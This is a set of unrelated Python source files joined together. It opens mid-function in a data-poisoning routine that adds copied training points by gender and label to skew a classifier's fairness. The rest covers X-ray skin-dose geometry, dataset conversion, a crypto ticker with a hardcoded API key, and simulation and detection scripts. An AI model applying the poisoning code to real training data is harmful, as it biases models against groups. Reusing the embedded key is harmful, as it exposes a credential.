np.where(feasible_flipped_mask & (Y_train == -1) & (gender_labels == 1))[0])
else:
advantaged = 1
pos_idx_to_copy = np.random.choice(
np.where(feasible_flipped_mask & (Y_train == 1) & (gender_labels == 1))[0])
neg_idx_to_copy = np.random.choice(
np.where(feasible_flipped_mask & (Y_train == -1) & (gender_labels == -1))[0])
if(neg_idx_to_copy in female_train_index):
print("female")
else:
print("male")
if(pos_idx_to_copy in female_train_index):
print("female")
else:
print("male")
print(neg_idx_to_copy)
print(pos_idx_to_copy)
# exit()
num_pos_copies -= 1
num_neg_copies -= 1
X_modified, Y_modified = data.add_points(
X_train[pos_idx_to_copy, :],
1,
X_train,
Y_train,
num_copies=1)
X_modified, Y_modified = data.add_points(
X_train[neg_idx_to_copy, :],
-1,
X_modified,
Y_modified,
num_copies=1)
X_modified, Y_modified = data.add_points(
X_train[pos_idx_to_copy, :],
1,
X_modified,
Y_modified,
num_copies=num_pos_copies)
X_modified, Y_modified = data.add_points(
X_train[neg_idx_to_copy, :],
-1,
X_modified,
Y_modified,
num_copies=num_neg_copies)
copy_array = [num_pos_copies, num_neg_copies]
indices_to_poison = np.arange(X_train.shape[0], X_train.shape[0] + 2)
return X_modified, Y_modified, indices_to_poison, copy_array, advantaged, test_gender_labels
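# Illustrative worked example (all numbers below are hypothetical): with
# use_copy=True, X_train.shape[0] == 1000, epsilon == 0.1 and 40% of Y_train
# equal to -1, we get num_copies == 100, num_pos_copies == 40 and
# num_neg_copies == 60. One copy of each sampled point is appended first, so the
# function returns copy_array == [39, 59] and indices_to_poison == [1000, 1001],
# for a total of 100 appended poisoned points.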
|
import logging
from typing import List, Any
import numpy as np
import pandas as pd
import pyskindose.constants as c
from .db_connect import db_connect
from .phantom_class import Phantom
logger = logging.getLogger(__name__)
def calculate_field_size(field_size_mode, data_parsed, data_norm):
"""Calculate X-ray field size at image recepter plane.
Parameters
----------
field_size_mode : str
Choose either 'CFA' ('collimated field area) or 'ASD' (actual shutter
distance).
If field_size_mode = 'CFA', the field side in lateral- and
longutudinal direction are set equal to the square root of the
collimated field area. NOTE, this should only be used when actual
shutter distances are unavailabe.
IF field_size_mode = 'ASD', the function calculates the field size
by distance scaling the actual shutter distance to the detector plane
data_parsed : [type]
[description]
data_norm : [type]
[description]
Returns
-------
[type]
[description]
"""
    # if collimated field area mode, set FS_lat = FS_long =
    # sqrt(collimated field area). NOTE: This should only be used when actual
# shutter distances are unavailable.
if field_size_mode == 'CFA':
FS_lat = round(100 * np.sqrt(data_parsed.CollimatedFieldArea_m2), 3)
FS_long = FS_lat
return FS_lat, FS_long
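# Example (illustrative): for an event with CollimatedFieldArea_m2 == 0.04 and
# field_size_mode == 'CFA', the function returns FS_lat == FS_long == 20.0,
# i.e. a 20 cm x 20 cm field at the image receptor plane.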
def position_geometry(
patient: Phantom,
table: Phantom,
pad: Phantom,
pad_thickness: Any,
patient_offset: List[int],
        patient_orientation: str
) -> None:
"""Manual positioning of the phantoms before procedure starts.
In this function, the patient phantom, support table, and pad are
positioned to the starting position for the procedure. This is done by
rotating and translating the patient, table and pad phantoms so that
the correct starting position is achieved. Currently, the patient is
assumed to lie in supine position. The effect of this positioning can be
displayed by running mode == "plot_setup" in main.py.
Parameters
----------
patient : Phantom
Patient phantom, either plane, cylinder or human.
table : Phantom
Table phantom to represent the patient support table
pad : Phantom
Pad phantom to represent the patient support pad
pad_thickness: Any
Patient support pad thickness
patient_offset : List[int]
        Offset of the patient phantom from being centered at the head end of
        the table top, given as [Tx: <int>, Ty: <int>, Tz: <int>] in cm.
patient_orientation : str
patient orientation upon table. Choose between
c.PATIENT_ORIENTATION_HEAD_FIRST_SUPINE and
c.PATIENT_ORIENTATION_FEET_FIRST_SUPINE.
"""
# rotate 90 deg about LON axis to get head end in positive LAT direction,
# i.e. in head first supine position.
table.rotate(angles=[90, 0, 0])
pad.rotate(angles=[90, 0, 0])
patient.rotate(angles=[90, 0, 0])
# if feet-first, rotate patient 180 degrees about y-axis
if patient_orientation == c.PATIENT_ORIENTATION_FEET_FIRST_SUPINE:
patient.rotate(angles=[0, 180, 0])
# translate to get origin centered along the head end of the table
table.translate(dr=[0, 0, -max(table.r[:, 2])])
pad.translate(dr=[0, 0, -max(pad.r[:, 2])])
patient.translate(dr=[0, 0, -max(patient.r[:, 2])])
# place phantom directly on top of the pad
patient.translate(dr=[0, -(max(patient.r[:, 1] + pad_thickness)), 0])
    # offset the patient from the head end of the table by patient_offset
patient.translate(dr=patient_offset)
# Save reference table position:
table.save_position()
pad.save_position()
patient.save_position()
def vector(start: np.array, stop: np.array, normalization=False) -> np.array:
"""Create a vector between two points in carthesian space.
This function creates a simple vector between point <start> and point
<stop> The function can also create a unit vector from <start>, in the
direction to <stop>.
Parameters
----------
start : np.array
Starting point of the vector
stop : np.array
Stopping point of the vector
normalization : bool, optional
Toggle normalization (the default is False, which implies no
normalization)
Returns
-------
np.array
A vector from "start" to "stop", or if normalization=True, a unit
vector from "start" in the direction towards "stop".
"""
# Calculate vector from start to stop
vec = stop - start
# Normalize if requested
if normalization:
# Normalize vector
mag = np.sqrt(vec.dot(vec))
vec = vec / mag
return vec
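# Example (illustrative): vector(np.array([0, 0, 0]), np.array([3, 4, 0]))
# returns array([3, 4, 0]), while adding normalization=True returns the unit
# vector array([0.6, 0.8, 0. ]), since the magnitude of (3, 4, 0) is 5.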
def scale_field_area(data_norm: pd.DataFrame, event: int, patient: Phantom,
hits: List[bool], source: np.array) -> List[float]:
"""Scale X-ray field area from image detector, to phantom skin cells.
This function scales the X-ray field size from the point where it is stated
in data_norm, i.e. at the image detector plane, to the plane at the phantom
skin cell. This is the field size of interest since this area is required
as input for k_med and k_bs correction factor calculations. This function
conducts this scaling for all skin cells that are hit by the X-ray beam in
a specific irradiation event.
Parameters
----------
data_norm : pd.DataFrame
RDSR data, normalized for compliance with PySkinDose.
event : int
Irradiation event index.
patient : Phantom
Patient phantom, i.e. instance of class Phantom.
hits : List[bool]
A boolean list of the same length as the number of patient skin
cells. True for all entrance skin cells that are hit by the beam for a
specific irradiation event.
source : np.array
(x,y,z) coordinates to the X-ray source
Returns
-------
List[float]
        X-ray field area (in cm^2) for each phantom skin cell that is hit by
        the X-ray beam.
"""
# Fetch reference distance for field size scaling,
# i.e. distance source to detector
d_ref = data_norm.DSD[event]
cells = patient.r[hits]
# Calculate distance scale factor
scale_factor = [np.linalg.norm(cell - source) / d_ref for cell in cells]
    # Fetch field area at the image detector plane, i.e. the product of the
    # lateral and longitudinal field side lengths
field_area_ref = data_norm.FS_lat[event] * data_norm.FS_long[event]
# Calculate field area at distance source to skin cell for all cells
# that are hit by the beam.
field_area = [round(field_area_ref * np.square(scale), 1)
for scale in scale_factor]
return field_area
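# Example (illustrative): for a skin cell located at half the reference
# source-to-detector distance d_ref, the scale factor is 0.5, so a field area of
# 100 cm^2 at the detector plane corresponds to 100 * 0.5^2 = 25.0 cm^2 at that
# skin cell.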
def fetch_and_append_hvl(data_norm: pd.DataFrame) -> pd.DataFrame:
"""Add event HVL to RDSR event data from database.
Parameters
----------
data_norm : pd.DataFrame
RDSR data, normalized for compliance with PySkinDose.
Returns
-------
data_norm
This function appends event specific HVL (mmAl) as a function of device
model, kVp, and copper- and aluminum filtration to the normalized RDSR
data in data_norm and returns the DataFrame with the HVL info appended.
"""
# Open connection to database
conn = db_connect()[0]
# Fetch entire HVL table
hvl_data = pd.read_sql_query("SELECT * FROM HVL_simulated", conn)
hvl = [float(hvl_data.loc[
(hvl_data['DeviceModel'] == data_norm.model[event]) &
(hvl_data['kVp_kV'] == round(data_norm.kVp[event])) &
(hvl_data['AddedFiltration_mmCu'] ==
data_norm.filter_thickness_Cu[event]), "HVL_mmAl"])
for event in range(len(data_norm))]
# Append HVL data to data_norm
data_norm["HVL"] = hvl
# close database connection
conn.commit()
conn.close()
return data_norm
def check_new_geometry(data_norm: pd.DataFrame) -> List[bool]:
"""Check which events has unchanged geometry since the event before.
This function is intented to calculate if new geometry parameters needs
to be calculated, i.e., new beam, geometry positioning, field area and
cell hit calculation.
Parameters
----------
data_norm : pd.DataFrame
RDSR data, normalized for compliance with PySkinDose.
Returns
-------
List[bool]
List of booleans where True[event] means that the event has updated
geometry since the preceding irradiation event.
"""
logger.info(
"Checking which irradiation events contain changes in geometry"
"compared to previous event")
logger.debug("Listing all RDSR geometry parameters")
geom_params = data_norm[['Tx', 'Ty', 'Tz', 'FS_lat', 'FS_long',
'Ap1', 'Ap2', 'Ap3', 'At1', 'At2', 'At3']]
logger.debug(
"Checking which irradiation events that does not have same"
"parameters as previous")
changed_geometry = [not geom_params.iloc[event].equals(
geom_params.iloc[event - 1]) for event in range(1, len(geom_params))]
logger.debug("Insert True to the first event to indicate that it has a"
"new geometry")
changed_geometry.insert(0, True)
return changed_geometry
class Triangle:
"""A class used to create triangles.
This class creates a triangle from a set of three coordinates in 3D
    Cartesian space. The purpose of this class is to use it to calculate if a
3D segment intercepts the triangle.
Attributes
----------
p: np.array
        Cartesian 3D coordinates to the central vertex of the triangle
p1: np.array
Vector from p to first vertex
p2: np.array
Vector from p to second vertex
n: np.array
normal vector to the triangle, pointing upwards (negative y direction).
Methods
-------
check_intersection
check if a 3D segment intercepts with the triangle. For our
purpose, the 3D segment represents an X-ray beam from the X-ray
source to the phantom skin cell. If the beam intercepts, table- and
pad fluence correction should be conducted when calculating skin
dose for that particular cell. Please visit project documentation
(https://dev.azure.com/Sjukhusfysiker/PySkinDose/_wiki/) for a
clearer description and illustration for this method.
"""
def __init__(self, p: np.array, p1: np.array, p2: np.array):
"""Initialize class attributes."""
self.p = p
self.p1 = vector(self.p, p1)
self.p2 = vector(self.p, p2)
n = np.cross(self.p1, self.p2)
self.n = n/np.sqrt(n.dot(n))
def check_intersection(self, start: np.array,
stop: np.array) -> List[bool]:
"""Check if a 3D segment intercepts with the triangle.
Check if a 3D segment intercepts with the triangle. For our purpose,
the 3D segment represents an X-ray beam from the X-ray source to the
phantom skin cell and the triangle represent parts of the patient
support table. If the beam intercepts, table- and pad fluence
correction should be conducted when calculating skin dose for that
particular cell.
Parameters
----------
start : np.array
            Cartesian 3D coordinates to the starting point of the segment.
        stop : np.array
            Cartesian 3D coordinates to the end points of the segment. Note,
            can be several points, e.g., several skin cells.
Returns
-------
List[bool]
Boolean list which specifies whether each segment between start
and each of coordinates in stop are intercepted by the triangle.
"""
# Vector from source to central vertex
# w = vector(start, self.p)
w = self.p - start
# List of unit vectors from start, to each of the coordinates in stop.
v = ((stop - start).T /
np.linalg.norm(stop - start, axis=stop.ndim-1)).T
# Distances from start to the plane of the triangle, in the direction
# along the vector v.
k = (np.dot(w, self.n)) / (np.dot(v, self.n))
# Vector from origin to beam-table interceptions.
i = start + (k * v.T).T
# Vector from central vertex p to i
p_i = i - self.p
d = np.square(
np.dot(self.p1, self.p2)) - np.dot(self.p1, self.p1) * \
np.dot(self.p2, self.p2)
d1 = (np.dot(self.p1, self.p2) * np.dot(p_i, self.p2) -
np.dot(self.p2, self.p2) * np.dot(p_i, self.p1)) / d
d2 = (np.dot(self.p1, self.p2) * np.dot(p_i, self.p1) -
np.dot(self.p1, self.p1) * np.dot(p_i, self.p2)) / d
        # Now we have p_i = d1 * p1 + d2 * p2 (d1 and d2 already include the
        # division by d above), thus, if 0 <= d1 <= 1, 0 <= d2 <= 1 and
        # d1 + d2 <= 1, the beam intercepts the triangle.
hits = np.array([d1 >= 0, d1 <= 1,
d2 >= 0, d2 <= 1,
d1 + d2 <= 1]).all(axis=0)
return hits.tolist()
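# Example (illustrative): a Triangle with p=(0, 0, 0), p1=(1, 0, 0) and
# p2=(0, 0, 1) has normal n=(0, -1, 0). For start=(0.25, 1, 0.25) and
# stop=[(0.25, -1, 0.25)], the beam-plane interception is i=(0.25, 0, 0.25),
# which gives d1 = d2 = 0.25; all five conditions hold, so check_intersection
# returns [True].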
def check_table_hits(source: np.array, table: Phantom, beam,
cells: np.array) -> List[bool]:
"""Check which skin cells are blocket by the patient support table.
This fuctions creates two triangles covering the entire surface of the
patient support table, and checks if the skin cells are blocked by the
table. This is conducted in order to be able to append table and pad
correction factor k_(T+P) when required.
Parameters
----------
source : np.array
        Cartesian 3D coordinates to the X-ray source
table : Phantom
Patient support table, i.e., instance of class phantom with
phantom_type="table"
beam : Beam
X-ray beam, i.e., instance of class Beam.
cells : np.array
        List of skin cells to be checked for whether the patient support table
        and pad block the beam before it reaches them.
Returns
-------
List[bool]
Boolean list of the statuses of each skin cell. True if the path from
X-ray source to skin cell is blocked by the table (any of the two
triangles), else false. Start points above triangle returns False,
to not include hits where the table does not block the beam.
"""
# Create triangles:
# Define edges of table (see illustration in project documentation)
a = table.r[6, :]
a1 = table.r[7, :]
a2 = table.r[5, :]
b = table.r[0, :]
b1 = table.r[5, :]
b2 = table.r[7, :]
# triangle spanning the "top right" part of the support table
# (viewed from above)
triangle_b_l = Triangle(p=a, p1=a1, p2=a2)
# triangle spanning the "bottom left" part of the support table
# (viewed from above)
triangle_t_r = Triangle(p=b, p1=b1, p2=b2)
# If over-table irradiation, return false for all points in cells
if np.dot(np.array([0, 0, 0]) - beam.r[0, :], triangle_b_l.n) < 0:
if cells.ndim == 1:
return [False]
return [False] * cells.shape[0]
# Check if beam vertices hits table on either of the triangles
hit_t_r = triangle_t_r.check_intersection(start=source, stop=beam.r[1:, :])
hit_b_l = triangle_b_l.check_intersection(start=source, stop=beam.r[1:, :])
    # If all four beam vertices hit the table, all cells are blocked by the
# table, and all cells should be corrected for table and pad attenuation.
if sum(hit_t_r + hit_b_l) == 4:
if cells.ndim == 1:
return [True]
return [True] * cells.shape[0]
# Else, check individually for all skin cells that are hit by the beam
hit_t_r = triangle_t_r.check_intersection(start=source, stop=cells)
hit_b_l = triangle_b_l.check_intersection(start=source, stop=cells)
hits = np.asarray([False] * len(cells))
# save results
hits[hit_t_r] = True
hits[hit_b_l] = True
return hits.tolist()
|
# Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
#
import json
import string
# The paths need to be updated
visdial_train_data_file = 'visdial_0.9_train.json'
visdial_val_data_file = 'visdial_0.9_val.json'
vdtrain_questions_file = 'v2_OpenEnded_mscoco_vdtrain_questions.json'
vdval_questions_file = 'v2_OpenEnded_mscoco_vdval_questions.json'
vdtrain_annotations_file = 'v2_mscoco_vdtrain_annotations.json'
vdval_annotations_file = 'v2_mscoco_vdval_annotations.json'
translator = str.maketrans('', '', string.punctuation)
vdtrain_questions = []
vdval_questions = []
vdtrain_annotations = []
vdval_annotations = []
with open(visdial_train_data_file, 'r') as f:
vdtrain_data = json.load(f)
vdtrain_data_questions = vdtrain_data['data']['questions']
vdtrain_data_answers = vdtrain_data['data']['answers']
vdtrain_dialogs = vdtrain_data['data']['dialogs']
count = 1
for dialogs in vdtrain_data['data']['dialogs']:
image_id = dialogs['image_id']
for dialog in dialogs['dialog']:
qid = dialog['question']
aid = dialog['answer']
q = vdtrain_data_questions[qid]
a = vdtrain_data_answers[aid]
question = {}
annotation = {}
question['image_id'] = image_id
question['question_id'] = count
question['question'] = q
vdtrain_questions.append(question)
a = a.translate(translator)
a = a.lower()
annotation['multiple_choice_answer'] = a
annotation['question_id'] = count
annotation['answers'] = []
for i in range(10):
answer = {}
answer['answer'] = a
            answer['answer_confidence'] = 'yes'
answer['answer_id'] = i + 1
annotation['answers'].append(answer)
vdtrain_annotations.append(annotation)
count = count + 1
print("Total qa train " + str(count))
with open(visdial_val_data_file, 'r') as f:
vdval_data = json.load(f)
vdval_data_questions = vdval_data['data']['questions']
vdval_data_answers = vdval_data['data']['answers']
vdval_dialogs = vdval_data['data']['dialogs']
count = 1
for dialogs in vdval_data['data']['dialogs']:
image_id = dialogs['image_id']
for dialog in dialogs['dialog']:
qid = dialog['question']
aid = dialog['answer']
        q = vdval_data_questions[qid]
        a = vdval_data_answers[aid]
question = {}
annotation = {}
question['image_id'] = image_id
question['question_id'] = count
question['question'] = q
vdval_questions.append(question)
a = a.lower()
a = a.translate(translator)
annotation['multiple_choice_answer'] = a
annotation['question_id'] = count
annotation['answers'] = []
for i in range(10):
answer = {}
answer['answer'] = a
            answer['answer_confidence'] = 'yes'
answer['answer_id'] = i + 1
annotation['answers'].append(answer)
vdval_annotations.append(annotation)
count = count + 1
print("Total qa val " + str(count))
vdtrain_data = {}
vdtrain_data['questions'] = vdtrain_questions
vdval_data = {}
vdval_data['questions'] = vdval_questions
with open(vdtrain_questions_file, 'w') as f:
json.dump(vdtrain_data, f)
with open(vdval_questions_file, 'w') as f:
json.dump(vdval_data, f)
vdtrain_data = {}
vdtrain_data['annotations'] = vdtrain_annotations
vdval_data = {}
vdval_data['annotations'] = vdval_annotations
with open(vdtrain_annotations_file, 'w') as f:
json.dump(vdtrain_data, f)
with open(vdval_annotations_file, 'w') as f:
json.dump(vdval_data, f)
|
#! /usr/bin/python
#-*-coding:utf-8-*-
import urllib.request
import json
import sys, time
import curses
import console_view as cv
class fetch_coinmarket(cv.console_view):
def __init__(self, x = 0, y = 0, width = 80, height = 15, is_view = True):
cv.console_view.__init__(self, x, y, width, height, is_view)
self.is_stop = False
self.num = 50
self.pos_y = 2
self.targetSymbol = ('BTC','ETH','XRP', 'BCH', 'LTC', 'DASH', 'USDT', 'DOGE')
#self.coin_url = "https://pro-api.coinmarketcap.com/v1/ticker/?limit=%d"%self.num
self.coin_url = "https://pro-api.coinmarketcap.com/v1/cryptocurrency/listings/latest"
def stop(self):
self.is_stop = True
curses.endwin()
print('stopped')
def start(self):
print(self.coin_url)
#self.stdscr = curses.initscr()
#self.stdscr = curses.initscr()
#self.stdscr = curses.newwin(15, 80, 0, 0)
self.stdscr = curses.newwin(self.display_pos['height'], self.display_pos['width'], self.display_pos['y'], self.display_pos['x'])
#self.stdscr = curses.newpad(600, 800)
curses.start_color()
curses.init_pair(1, curses.COLOR_GREEN, curses.COLOR_BLACK)
curses.init_pair(2, curses.COLOR_RED, curses.COLOR_BLACK)
curses.init_pair(3, curses.COLOR_YELLOW, curses.COLOR_BLACK)
while not self.is_stop:
cur_pos_x = 2;
headers = {
'Accepts': 'application/json',
'X-CMC_PRO_API_KEY': 'b22f9e6d-6c09-431d-ac9a-fd87131fc9a5',
}
req = urllib.request.Request(url=self.coin_url, headers=headers)
res = urllib.request.urlopen(req)
page = res.read()
json_obj = json.loads(page)
print(json_obj)
self.stdscr.box(curses.ACS_VLINE, curses.ACS_HLINE)
self.stdscr.addstr(cur_pos_x,self.pos_y,'Coin market cap', curses.color_pair(3))
cur_pos_x += 1;
self.stdscr.addstr(cur_pos_x,self.pos_y,time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()) ), curses.color_pair(3))
cur_pos_x += 1;
print_head = "Symbol \tPrice($) \tPercent(24h)"
self.stdscr.addstr(cur_pos_x,self.pos_y,print_head,curses.color_pair(3))
cur_pos_x += 1;
            for i in range(self.num):
                color_index = 1
                # The pro API returns {'status': ..., 'data': [...]}, with the
                # price data nested under each coin's 'quote' -> 'USD' entry.
                coin = json_obj['data'][i]
                quote = coin['quote']['USD']
                if coin['symbol'] in self.targetSymbol:
                    print_content = "%7s \t%10.2f \t%7.2f" % (coin['symbol'], quote['price'], quote['percent_change_24h'])
                    if quote['percent_change_24h'] < 0:
                        color_index = 2
                    self.stdscr.addstr(cur_pos_x, self.pos_y, print_content, curses.color_pair(color_index))
                    cur_pos_x += 1
#stdscr.addstr(i, 0, "hi:%d"%i)
#sys.stdout.flush()
self.stdscr.refresh()
time.sleep(10)
if __name__ == "__main__":
curses.initscr()
coin_market = fetch_coinmarket()
try:
coin_market.start()
except KeyboardInterrupt as e:
coin_market.stop()
|
"""
Trait for a Slot meant to contain an object of a particular type
or having a particular interface (either a Traits interface or a
zope.interface).
"""
# The regular Instance class that comes with Traits will only check public
# methods on an object if that object is not a HasTraits object, which means
# we get essentially no error checking for things like Case iterators where
# their API doesn't include any public methods. If we use zope.interface we
# don't have this problem.
#public symbols
__all__ = ["Slot"]
from inspect import isclass
# pylint: disable-msg=E0611,F0401
from enthought.traits.api import Instance, Interface
import zope.interface
from openmdao.main.variable import Variable, gui_excludes
from openmdao.main.mp_support import has_interface
from openmdao.main.interfaces import IContainer
class Slot(Variable):
"""A trait for an object of a particular type or implementing a particular
interface. Both Traits Interfaces and zope.interface.Interfaces are
supported.
"""
def __init__(self, klass=object, allow_none=True, factory=None,
args=None, kw=None, **metadata):
default_value = None
try:
iszopeiface = issubclass(klass, zope.interface.Interface)
except TypeError:
iszopeiface = False
if not isclass(klass):
default_value = klass
klass = klass.__class__
metadata.setdefault('copy', 'deep')
self._allow_none = allow_none
self.klass = klass
if has_interface(klass, IContainer) or (isclass(klass) and \
IContainer.implementedBy(klass)):
self._is_container = True
else:
self._is_container = False
if iszopeiface:
self._instance = None
self.factory = factory
self.args = args
self.kw = kw
else:
self._instance = Instance(klass=klass, allow_none=allow_none,
factory=factory, args=args, kw=kw,
**metadata)
if default_value:
self._instance.default_value = default_value
else:
default_value = self._instance.default_value
super(Slot, self).__init__(default_value, **metadata)
def validate(self, obj, name, value):
''' wrapper around Enthought validate method'''
if value is None:
if self._allow_none:
return value
self.validate_failed(obj, name, value)
if self._instance is None: # our iface is a zope.interface
if not self.klass.providedBy(value):
self._iface_error(obj, name, self.klass.__name__)
else:
try:
value = self._instance.validate(obj, name, value)
except Exception:
if issubclass(self._instance.klass, Interface):
self._iface_error(obj, name, self._instance.klass.__name__)
else:
obj.raise_exception("%s must be an instance of class '%s'" %
(name, self._instance.klass.__name__),
TypeError)
return value
def post_setattr(self, obj, name, value):
'''Containers must know their place within the hierarchy, so set their
parent here. This keeps side effects out of validate()'''
if self._is_container and value is not None:
if value.parent is not obj:
value.parent = obj
# VariableTrees also need to know their iotype
if hasattr(value, '_iotype'):
value._iotype = self.iotype
def _iface_error(self, obj, name, iface_name):
obj.raise_exception("%s must provide interface '%s'" %
(name, iface_name), TypeError)
def get_attribute(self, name, value, trait, meta):
"""Return the attribute dictionary for this variable. This dict is
used by the GUI to populate the edit UI. Slots also return an
attribute dictionary for the slot pane.
name: str
Name of variable
value: object
The value of the variable
trait: CTrait
The variable's trait
meta: dict
Dictionary of metadata for this variable
"""
io_attr = {}
io_attr['name'] = name
io_attr['type'] = trait.trait_type.klass.__name__
io_attr['ttype'] = 'slot'
slot_attr = {}
slot_attr['name'] = name
if value is None:
slot_attr['filled'] = None
        elif value == []:
slot_attr['filled'] = []
else:
slot_attr['filled'] = type(value).__name__
slot_attr['klass'] = io_attr['type']
slot_attr['containertype'] = 'singleton'
for field in meta:
if field not in gui_excludes:
slot_attr[field] = meta[field]
return io_attr, slot_attr
|
import os
import sys
import multiprocessing
import argparse
import torch
import torchvision.transforms as transforms
import numpy as np
import resnet_backbone
from bbox_tr import plot_bbox
from matplotlib import pyplot as plt
from PIL import Image
from TRD import TRD
from polynms import nms_poly
def predit_image(net,
device,
transform,
img_path,
overlap,
score_thresh,
iou_thresh,
cd_thresh,
show=False,
save=True):
image = Image.open(img_path)
net.eval()
with torch.no_grad():
pred = net.bigdetect(image,
transform,
overlap,
score_thresh=score_thresh,
iou_thresh=iou_thresh,
cd_thresh=cd_thresh,
device=device)
if pred is not None:
if(show):
plot_bbox(np.asarray(image), pred, scores=pred[:,7], labels=pred[:,6])
plt.show()
if(save):
image_id,_ = os.path.splitext(img_path)
lbl_file = open(image_id+'.txt', 'w')
for _, bbox in enumerate(pred):
lbl_file.write(
str(int(bbox[6])) + " "
+ " ".join(['%.7f'%a for a in bbox[:4]]) + " "
+ str(int(bbox[4])) + " "
+ '%.7f'%bbox[5] + " "
+ '%.7f'%bbox[7] + '\n')
lbl_file.close()
def get_args():
parser = argparse.ArgumentParser(description='Predict Objects by TRD on input image or dir',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('-m', '--model', metavar='M', type=str, default=r"E:\SourceCode\Python\pytorch_test\resnet50-19c8e357.pth",
help='TRD model path', dest='model')
parser.add_argument('-i', '--input', metavar='IN', type=str, default=r'D:\cvImageSamples\lan4\test\四尾栅藻 (4).JPG',
help='Filename or dir of input images',dest='image_path')
parser.add_argument('-iz', '--image-size', metavar='IZ', type=int, default=416,
help='Network input image size', dest='image_size')
parser.add_argument('-ie', '--image-ext', metavar='IE', type=str, default='.bmp',
help='Image extension name, must provided when input path is dir', dest='image_ext')
parser.add_argument('-o', '--overlap', metavar='O', type=int, default=172,
help='Overlap of spliting image to fit network input', dest='overlap')
parser.add_argument('-c', '--num-classes', metavar='C', type=int, default=1,
help='Number of classes', dest='num_classes')
parser.add_argument('-st', '--score-thresh', metavar='ST', type=float, default=0.51,
help='Score threshold', dest='score_thresh')
parser.add_argument('-it', '--iou-thresh', metavar='IT', type=float, default=0.3,
help='IOU threshold', dest='iou_thresh')
parser.add_argument('-ct', '--cen-dis-thresh', metavar='CT', type=float, default=0.1,
help='Box center distance threshold', dest='cd_thresh')
return parser.parse_args()
if __name__ == '__main__':
torch.multiprocessing.freeze_support()
args = get_args()
bboxw_range = [(48,144),(24,72),(12,36)]
net = TRD(bboxw_range,args.image_size,args.num_classes)
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
    # Load the pretrained resnet parameters
pretrained_dict = torch.load(args.model)
model_dict = net.state_dict()
    # Remove the keys in pretrained_dict that are not in model_dict
pretrained_dict = {k: v for k, v in pretrained_dict.items() if k in model_dict}
    # Update the existing model_dict
model_dict.update(pretrained_dict)
    # Load the state_dict we actually need
net.load_state_dict(model_dict)
# net.load_state_dict(torch.load(args.model))
net.to(device)
transform = transforms.Compose([
transforms.ToTensor()])
if(os.path.isfile(args.image_path)):
predit_image(net,
device,
transform,
args.image_path,
args.overlap,
score_thresh=args.score_thresh,
iou_thresh=args.iou_thresh,
cd_thresh=args.cd_thresh,
show=True,
save=True)
elif (os.path.isdir(args.image_path)):
for i in os.listdir(args.image_path):
image_id,image_ext = os.path.splitext(i)
if image_ext.lower() == args.image_ext:
image_path = os.path.join(args.image_path,i)
predit_image(net,
device,
transform,
image_path,
args.overlap,
score_thresh=args.score_thresh,
iou_thresh=args.iou_thresh,
cd_thresh=args.cd_thresh,
show=False,
save=True)
|
from vpython import *
import numpy as np
import sys
sys.path.append(".")
import grow
from grow import *
import matplotlib.pyplot as plt
import time
scene2 = canvas(title='Simulation System', width=800, height=700, center=vector(0,0,0),
background=color.white)
#target
ball_position = vector(3,3,1)#vector(-4,-2,0)
ball_radius = 1
ball = sphere(pos=ball_position, radius=ball_radius, color = color.white) #(vec(246/255, 177/255, 76/255))
rod = cylinder(pos=ball_position, axis=vector(-3,-1,2), radius=ball_radius, color =color.white)
end_ball_position = rod.pos+rod.axis
end_ball = sphere(pos=end_ball_position, radius=ball_radius, color = color.white)# vec(246/255, 177/255, 76/255))
bottom_plane = box(pos=vec(0,0,-0.2),axis = vec(1,0,0), length=20, height=0.1, width=20,color = vec(180/255,180/255,180/255), up=vec(0,0,1))
#background1 = box(pos=vec(0,100,0),axis = vec(0,0,1), length=20, height=0.1, width=20,color = vec(180/255,180/255,180/255),texture = "sky.jpg")#'D:/Santanna/3D Grow/sky.jpg')
# plat initial
spr_dis = np.sqrt(3)/2*0.5
spr_len = 0.6
test = grow.Cell(Spr_distance = spr_dis, Spr_len = spr_len)
# light
lamp1 = local_light(pos=vec(100,100,-100), color=color.white*0.2)
lamp2 = local_light(pos=vec(100,-100,-100), color=color.white*0.2)
lamp3 = local_light(pos=vec(-100,-100,100), color=color.white*0.2)
lamp4 = local_light(pos=vec(100,-100,100), color=color.white*0.2)
#light2 = distant_light(direction=vector(100,100,100), color=color.white*0.2)
scene2.camera.up = vec(0,0,1)
scene2.camera.pos = vec(-6.60371, 1.34283, 2.26781) #(-4.21826, -6.77872, 2.1207)
scene2.camera.axis = vec(6.60371, -1.34283, -2.26781) #(4.21826, 6.77872, -2.1207)
time.sleep(5)
t=0
delt = 0.1
dt=spr_len*delt
dt_L = spr_len*delt
rate(200)
####################### reaching part ################################
#res = Grow_toward_one_target(test,steplenght = dt, ball_pos = ball_position, ball_rad = ball_radius)
#dis_list = test.Distance_from_top_to_target( ball_pos = ball_position, ball_rad = ball_radius)
res = Grow_toward_one_target(test, steplenght = dt,rod_pos = rod.pos, rod_axis = rod.axis, rod_rad = rod.radius)
dis_list = test.Distance_from_top_to_target(rod_pos = rod.pos, rod_axis = rod.axis, rod_rad = rod.radius)
min_dist = min(dis_list)
while (min_dist> spr_dis*2/np.sqrt(3) *1):
#res = Grow_toward_one_target(test, steplenght = dt, ball_pos = ball_position, ball_rad = ball_radius)
#dis_list = test.Distance_from_top_to_target(ball_pos = ball_position,ball_rad = ball_radius)
res = Grow_toward_one_target(test, steplenght = dt,rod_pos = rod.pos, rod_axis = rod.axis, rod_rad = rod.radius)
dis_list = test.Distance_from_top_to_target(rod_pos = rod.pos, rod_axis = rod.axis, rod_rad = rod.radius)
min_dist = min(dis_list)
if res == 0:
test.add_one_layer_on_top()
res = 1
###########################################################################
#dis = test.Distance_from_top_to_rod_shape(test, steplenght = dt, rod_pos = rod.pos, rod_axis = rod.axis, rod_rad = rod.radius )
Prepare_for_grasping(test, steplenght = dt, rod_pos = rod.pos, rod_axis = rod.axis, rod_rad = rod.radius )
Grow_coiling(test, steplenght = dt, rod_pos = rod.pos, rod_axis = rod.axis, rod_rad = rod.radius )
#Grow_climbing(test, steplenght = dt, rod_pos = rod.pos, rod_axis = rod.axis, rod_rad = rod.radius )
print("end")
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2020 CERN.
#
# Invenio-Records-Resources is free software; you can redistribute it and/or
# modify it under the terms of the MIT License; see LICENSE file for more
# details.
"""Facets parameter interpreter API."""
from .base import ParamInterpreter
